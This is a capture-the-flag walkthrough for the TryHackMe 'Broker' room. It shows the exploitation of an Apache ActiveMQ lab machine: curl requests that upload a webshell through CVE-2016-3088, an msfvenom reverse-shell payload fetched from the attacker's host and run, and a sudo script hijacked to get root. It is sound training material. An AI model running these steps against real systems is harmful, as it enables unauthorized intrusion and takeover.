TryHackMe: Broker
TryHackMe: broker by M0N573R777 and ripcurlz
Paul and Max use a rather unconventional way to chat. They do not seem to know that eavesdropping is possible though...
Task 1 - Deploy the machine
Start the machine.
Task 2 - Enumeration & flags
Paul and Max found a way to chat at work by using a certain kind of software. They think they outsmarted their boss, but do not seem to know that eavesdropping is quite possible...They better be careful...
Do a TCP portscan on all ports with port number greater than 1000 and smaller than 10000! Which TCP ports do you find to be open? (counting up)
For this I kick off my usual rustscan
and see what we find.
rustscan -a broker --ulimit 10000 -- -sC -sV -A -oA broker -v
Answer: [REDACTED],[REDACTED]
What is the name of the software they use?
From the above rustscan
we can see the http-title
in the output of the enumeration of the second port from the above answer, we just need to drop the Apache
bit from the title
Answer: [REDACTED]
Which videogame are Paul and Max talking about?
Browsing to the port from above we see Manage [REDACTED] broker
Clicking this presents us with a login prompt
Some basic Insert Search Engine Verb Here show us what the default username/password combo is, using the default creds we get in.
If we click Topics
in the top menu we get a list back which includes secret_chat
with some messages queued.
I tried several different applications and writing my own python script to try and get this working but ended up using MQTTLens
in Google Chrome
Answer: [REDACTED]
flag.txt
Hint: CVE for the software you found in question 2
Looking at the hint
we have a look in searchsploit
╰─⠠⠵ searchsploit activemq
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit) | java/remote/42283.rb
Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution | windows/remote/40857.txt
Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting | multiple/remote/33905.txt
Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit) | windows/remote/48181.rb
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Ok, there looks like a Metasploit can upload a webshell for us, let's try this...
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run
[*] Started reverse TCP handler on 10.9.5.198:4445
[-] Exploit failed: NoMethodError undefined method `body' for false:FalseClass
[*] Exploit completed, but no session was created.
Hmmm, that is annoying ...... Let's take a look at CVE-2016-3088
Ok, so this involves using PUT
and MOVE
requests to upload a file. First thing I do is grab a jsp webshell that we will use. Reading around the CVE details I put together the below curl requests
╰─⠠⠵ curl http://broker:8161/fileserver/shell.jsp -T shell.jsp -H 'Authorization: Basic YWRtaW46YWRtaW4=' -v
* Trying 10.10.43.18:8161...
* Connected to broker (10.10.43.18) port 8161 (#0)
> PUT /fileserver/shell.jsp HTTP/1.1
> Host: broker:8161
> User-Agent: curl/7.74.0
> Accept: */*
> Authorization: Basic YWRtaW46YWRtaW4=
> Content-Length: 827
> Expect: 100-continue
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 100 Continue
* We are completely uploaded and fine
* Mark bundle as not supporting multiuse
< HTTP/1.1 204 No Content
< Server: Jetty(7.6.9.v20130131)
<
* Connection #0 to host broker left intact
╰─⠠⠵ curl -X MOVE --header "Destination: file:///opt/apache-activemq-5.9.0/webapps/admin/shell.jsp" http://broker:8161/fileserver/shell.jsp -H 'Authorization: Basic YWRtaW46YWRtaW4=' -v
* Trying 10.10.43.18:8161...
* Connected to broker (10.10.43.18) port 8161 (#0)
> MOVE /fileserver/shell.jsp HTTP/1.1
> Host: broker:8161
> User-Agent: curl/7.74.0
> Accept: */*
> Destination: file:///opt/apache-activemq-5.9.0/webapps/admin/shell.jsp
> Authorization: Basic YWRtaW46YWRtaW4=
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 204 No Content
< Server: Jetty(7.6.9.v20130131)
<
* Connection #0 to host broker left intac
Now we have this we can use cat
to read flag.txt
Answer: THM{[REDACTED]}
root.txt
Hint: /etc/sudoers
Now that we have a webshell let's get a reverse shell. None of my usual reverse shell commands seemed to work so I created a new msfvenom
payload and start a python
webserver to host it
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.9.5.198 LPORT=4444 -f elf > shell4444
python3 -m http.server 7777
Then using curl
in the command box I downloaded the file and made it executable
curl http://10.9.5.198:7777/shell4444 -O shell4444
chmod +x shell4444
Now executing this we get a shell back
╰─⠠⠵ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.9.5.198] from (UNKNOWN) [10.10.43.18] 60796
ls
LICENSE
NOTICE
README.txt
activemq-all-5.9.0.jar
bin
chat.py
conf
data
flag.txt
lib
shell4444
start.sh
subscribe.py
test
tmp
webapps
Now let's get a stable shell with a pty.
python3 -c 'import pty;pty.spawn("/bin/bash")'
activemq@activemq:/opt/apache-activemq-5.9.0$ export TERM=xterm
export TERM=xterm
activemq@activemq:/opt/apache-activemq-5.9.0$ ^Z
[1] + 7576 suspended nc -lvnp 4444
╭─tj at kali
╰─⠠⠵ stty raw -echo; fg
[1] + 7576 continued nc -lvnp 4444
activemq@activemq:/opt/apache-activemq-5.9.0$
activemq@activemq:/opt/apache-activemq-5.9.0$
activemq@activemq:/opt/apache-activemq-5.9.0$
Running sudo -l
we get the following
Matching Defaults entries for activemq on activemq:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User activemq may run the following commands on activemq:
(root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
Checking the permissions on /opt/apache-activemq-5.9.0/subscribe.py
we see we have write permissions.
activemq@activemq:/opt/apache-activemq-5.9.0$ ls -l /opt/apache-activemq-5.9.0/subscribe.py
-rw-rw-r-- 1 activemq activemq 768 Dec 25 17:50 /opt/apache-activemq-5.9.0/subscribe.py
YUK!!!!! No vim
!!!! Having to use nano
instead we place the following at the top of the file.
import pty
pty.spawn("/bin/bash")
Now if we run our sudo
command we should get a root shell.
activemq@activemq:/opt/apache-activemq-5.9.0$ sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
root@activemq:/opt/apache-activemq-5.9.0#
From here we can read our root.txt
root@activemq:/opt/apache-activemq-5.9.0# cat /root/root.txt
THM{[REDACTED]}
Task 3 Credits
This is a room by ripcurlz and ms.geeky. We hope you enjoyed it :)
You can provide any feedback to: broker.thm@protonmail.com
Finish
Another room done!!! The MQTT
and Metasploit
bits were a bit of a pain but was an enjoyable room.